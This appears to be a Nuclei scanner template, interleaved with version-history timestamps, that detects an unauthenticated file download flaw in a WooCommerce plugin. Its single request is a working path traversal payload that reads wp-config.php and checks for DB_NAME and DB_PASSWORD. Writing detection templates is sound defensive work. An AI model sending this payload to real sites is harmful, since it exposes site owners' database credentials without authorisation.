2021-09-22 12:49:25 +00:00
id : wp-woocommerce-file-download
2021-09-21 22:34:09 +00:00
info :
2022-08-06 16:54:58 +00:00
name : Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
2021-09-21 22:34:09 +00:00
author : 0x_Akoko
severity : high
2022-08-10 08:28:11 +00:00
description : |
WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
reference : |
2021-09-21 22:34:09 +00:00
- https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
- https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
2022-04-15 16:39:44 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 8.6
cwe-id : CWE-22
2022-08-10 08:28:11 +00:00
tags : wordpress,woocommerce,lfi,wp-plugin,wp
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-09-21 22:34:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-21 22:34:09 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
part : body
condition : and
- type : status
status :
- 200